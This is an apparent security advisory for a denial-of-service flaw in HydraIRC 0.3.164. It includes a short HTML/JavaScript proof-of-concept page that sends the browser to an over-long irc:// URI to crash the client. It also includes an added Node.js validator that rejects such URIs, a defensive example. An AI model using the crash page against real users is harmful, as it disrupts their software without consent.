Release date: 2008-08-03
Updated: 2008-08-06
Affected systems:
HydraIRC HydraIRC 0.3.164
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30523
HydraIRC is an easy-to-use open source IRC client.
HydraIRC has a vulnerability in the way it handles malformed URIs. If a user is tricked into opening an overly long irc:// URI from a web browser with HydraIRC, this may trigger a null pointer dereference and crash the client.
<* Source: securfrog (securfrog@gmail.com)
Link: http://secunia.com/advisories/31376/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
<html>
<head> <title>HydraIRC Remote Denial Of Service Poc </title></head>
<body>
<script>
var site = 'irc://127.0.0.1/'
var buf = 'A';
while (buf.length <= 560) buf = buf + 'A';
document.location.href=site +buf
</script>
</body>
</html>
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
HydraIRC
--------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to check the vendor's home page regularly for the latest version:
http://www.hydrairc.com/
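Until a fixed version is available, a validating wrapper can be registered as the irc:// protocol handler so that malformed URIs are dropped before they reach the client. The following is an added example, not part of the original advisory and not HydraIRC code; the function name checkIrcUri and the length limits are assumptions, since the advisory does not state the exact length that triggers the crash.

```javascript
// Added example: pre-launch validation of irc:// URIs (Node.js, no dependencies).
// Assumption: the advisory gives no crash threshold, so the caps below are
// conservative choices, not values taken from the advisory.
const MAX_URI_LEN = 256;    // assumed cap on the whole URI
const MAX_TARGET_LEN = 50;  // RFC 2812 limit on channel-name length

function checkIrcUri(raw) {
  if (typeof raw !== 'string') return { ok: false, reason: 'not-a-string' };
  // Reject on length first, before any parsing work is done.
  if (raw.length > MAX_URI_LEN) return { ok: false, reason: 'uri-too-long' };
  // Raw control characters and spaces are never valid in a URI.
  if (/[\x00-\x20\x7f]/.test(raw)) return { ok: false, reason: 'control-or-space' };

  let u;
  try { u = new URL(raw); } catch { return { ok: false, reason: 'unparseable' }; }
  if (u.protocol !== 'irc:' && u.protocol !== 'ircs:') {
    return { ok: false, reason: 'wrong-scheme' };
  }
  if (!u.hostname) return { ok: false, reason: 'no-host' };

  // The target (channel or nick) is the path after the slash, else the fragment.
  let target;
  try {
    target = decodeURIComponent(u.pathname.slice(1) || u.hash.slice(1));
  } catch {
    return { ok: false, reason: 'bad-percent-encoding' };
  }
  if (target.length > MAX_TARGET_LEN) return { ok: false, reason: 'target-too-long' };
  // After decoding: NUL, BEL, CR, LF, space and comma are not valid in a target.
  if (/[\x00-\x20,\x7f]/.test(target)) return { ok: false, reason: 'illegal-target-char' };

  return { ok: true, host: u.hostname, port: u.port || '6667', target };
}

// Constructed sample inputs; the second has the same shape as the URI in the
// test method above.
const samples = [
  'irc://irc.example.net:6667/%23security',
  'irc://127.0.0.1/' + 'A'.repeat(561),
  'irc://127.0.0.1/' + 'A'.repeat(100),
];
for (const s of samples) {
  const r = checkIrcUri(s);
  console.log(`${s.slice(0, 40)} (len ${s.length}) ->`, r.ok ? 'pass to client' : r.reason);
}
```

The wrapper should start the IRC client only when the result has ok set to true, and should pass on the parsed host, port and target rather than the raw string.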